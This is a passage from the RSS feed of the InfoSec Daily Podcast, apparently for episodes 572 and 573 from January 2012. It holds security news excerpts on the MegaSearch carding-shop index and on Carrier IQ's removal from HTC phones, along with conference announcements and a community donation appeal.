<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://krebsonsecurity.com/2012/01/megasearch-aims-to-index-fraud-site-wares/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://krebsonsecurity.com/2012/01/megasearch-aims-to-index-fraud-site-wares/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A new service aims to be the Google search of underground Web sites, connecting buyers to a vast sea of shops that offer an array of dodgy goods and services, from stolen credit card numbers to identity information and anonymity tools.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A glut of data breaches and stolen card numbers has spawned dozens of stores that sell the information. The trouble is that each shop requires users to create accounts and sign in before they can search for cards.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Enter MegaSearch.cc, which lets potential buyers discover which fraud shops hold the cards they&rsquo;re looking for without having to first create accounts at each store. This free search engine aggregates data about compromised payment cards, and points searchers to various fraud shops selling them.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-573-good-riddance-sopapipa-young-love-shallow-talent-pool-ipv6-for-real-bad-guys-google/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3402/0/infosec-daily-podcast-episode-573.mp3" length="20215477" type="audio/mpeg" />
		<itunes:duration>0:42:06</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 573 for January 20, 2012. &#160;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 573 for January 20, 2012. &#160;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: MOVED: CampusCon has been moved to the main WIT campus on Browne&#39;s Road
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	BSides Chicago
	When: Saturday, April 28th, 2012
	Where: Volcano Room (further info coming)
	Cost: Free (as always!) &#8211; Registration opening soon!
	http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012
	They&#8217;re looking for sponsors, so if you know someone, pass it on.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go t[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 572 &#8211; Carrier IQ, Koobface, DNSViz, Obligatory Lawsuit, Source Code Swipe, &amp; DoJ Tango Down</title>
		<link>http://www.isdpodcast.com/episode-572-carrier-iq-koobface-dnsviz-obligatory-lawsuit-source-code-swipe-doj-tango-down</link>
		<comments>http://www.isdpodcast.com/episode-572-carrier-iq-koobface-dnsviz-obligatory-lawsuit-source-code-swipe-doj-tango-down#comments</comments>
		<pubDate>Fri, 20 Jan 2012 01:56:24 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3395</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 572 for January 19, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Adrian Crenshaw. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 572 for January 19, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Adrian Crenshaw.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (New Update!)</span><br />
	<a href="http://www.social-engineer.org/bradsmithdonation"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MOVED: CampusCon has been moved to the main WIT campus on Browne&#39;s Road</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 27-29, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Atlanta, GA </span><br />
	<a href="http://www.outerz0ne.org/OZ8/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org/OZ8/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.networkworld.com/news/2012/011812-htc-carrieriq-255021.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.networkworld.com/news/2012/011812-htc-carrieriq-255021.html</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Carrier IQ&#39;s performance monitoring software has been deleted from the latest firmware update for the HTC EVO 3D smartphone, at the behest of Sprint, according to a post at AndroidCentral. Many more could follow.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An earlier Sprint post revealed that the pending firmware version, due for Jan. 12 release, would be a security update. AndroidCentral reported this week that it would also boost battery life and offer an updated Peep client to align with Twitter.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After the version was released, programmers and hackers began delving into it. &quot;Folks who have checked around in the manage applications tab have noticed that &#39;HTC IQAgent&#39; and &#39;IQRD,&#39; both of which were Carrier IQ, are no longer present on the device after the update,&quot; according to AndroidCentral.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sprint, one of several carriers that use the Carrier IQ software, confirmed in December that it had &quot;disabled use of the tool so that diagnostic information data is no longer being collected,&quot; according to a story at MobileBurn, quoting from a Sprint email statement.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The HTC EVO 3D update may indicate that Sprint has ordered its handset partners to remove the software entirely. Email requests to Carrier IQ and Sprint for comment have not yet received replies.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
